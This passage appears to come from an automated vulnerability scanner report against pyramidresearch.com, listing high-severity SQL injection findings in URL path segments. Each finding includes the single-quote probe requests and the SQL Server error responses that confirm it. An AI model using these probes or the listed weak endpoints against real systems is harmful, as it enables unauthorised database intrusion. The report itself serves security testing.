Host:   http://www.pyramidresearch.com
Path:   /myaccount/register.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /myaccount'/register.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AKMKIDJBABFALIMCHCJOHMOP; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /myaccount''/register.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HKMKIDJBKGANDLDNAPNDMHGM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.50. http://www.pyramidresearch.com/points/item/101209.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /points/item/101209.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /points'/item/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CDNKIDJBBJOELBDMNDNDMLKN; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /points''/item/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DDNKIDJBMPHLDOFFCPGPGNHP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.51. http://www.pyramidresearch.com/points/item/101209.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /points/item/101209.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /points/item'/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KDNKIDJBAOBEGIEMGJCNDCAO; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /points/item''/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LDNKIDJBAMNNOHHEKPPEBKOJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.52. http://www.pyramidresearch.com/points/item/111810.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /points/item/111810.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /points'/item/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GENKIDJBHLGKOIPBOKFMPMHH; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /points''/item/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HENKIDJBMEPJLEKNAKJMOMBM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.53. http://www.pyramidresearch.com/points/item/111810.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /points/item/111810.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /points/item'/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KENKIDJBDHKBNDLAFCLEHLJE; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /points/item''/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LENKIDJBHPHPIDCANLHNFDBK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.54. http://www.pyramidresearch.com/points/item/120110.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /points/item/120110.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /points'/item/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FDNKIDJBOFFMKBFMOLEIKFFG; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /points''/item/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GDNKIDJBOMPAGPAMGMMKIKFI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.55. http://www.pyramidresearch.com/points/item/120110.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /points/item/120110.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /points/item'/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ODNKIDJBGCBNNDMELKIAAOEI; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /points/item''/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PDNKIDJBCIGCGIOHNKFHOLNH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.56. http://www.pyramidresearch.com/store/CIRGUATEMALA.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/CIRGUATEMALA.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/CIRGUATEMALA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FLMKIDJBIHICDKCBAPGOGKMA; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/CIRGUATEMALA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ILMKIDJBBDPMKJBNMFKEIFNN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.57. http://www.pyramidresearch.com/store/CIRISRAEL.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/CIRISRAEL.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/CIRISRAEL.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LIMKIDJBHNOPJJDIHOOKMNAJ; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/CIRISRAEL.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NIMKIDJBGEBBAJNGJPDAFBMN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.58. http://www.pyramidresearch.com/store/CIRPANAMA.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/CIRPANAMA.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/CIRPANAMA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NGMKIDJBBLHENDIHCMKHAHFK; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/CIRPANAMA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AHMKIDJBGEHIELFNLMPGAHBO; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.59. http://www.pyramidresearch.com/store/CIRSAUDIARABIA.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/CIRSAUDIARABIA.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/CIRSAUDIARABIA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=IHMKIDJBDCEOIFKONOMDAGNL; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/CIRSAUDIARABIA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JHMKIDJBGDCAPKKPONJJFDKN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.60. http://www.pyramidresearch.com/store/CIRVIETNAM.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/CIRVIETNAM.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/CIRVIETNAM.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PJMKIDJBNLMCIFEOMCEKJAJC; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/CIRVIETNAM.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FKMKIDJBOJDOOFAHNFCPMPPM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.61. http://www.pyramidresearch.com/store/PREPMNGDSERV.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/PREPMNGDSERV.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/PREPMNGDSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DFLKIDJBFHBBOCNPNLDKPNCA; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/PREPMNGDSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FFLKIDJBCMHDONGCPGCBJPDH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.62. http://www.pyramidresearch.com/store/REPORT_SMARTPHONE_STRATEGIES.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/REPORT_SMARTPHONE_STRATEGIES.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FGLKIDJBDHIJAKFCEAJAPHNH; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GGLKIDJBFFGLGEIDHAGGJNLE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.63. http://www.pyramidresearch.com/store/RPINTERNETTV.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyramidresearch.com
Path:   /store/RPINTERNETTV.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/RPINTERNETTV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EPKKIDJBLIDPJEBNNIBLDPMC; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /store''/RPINTERNETTV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
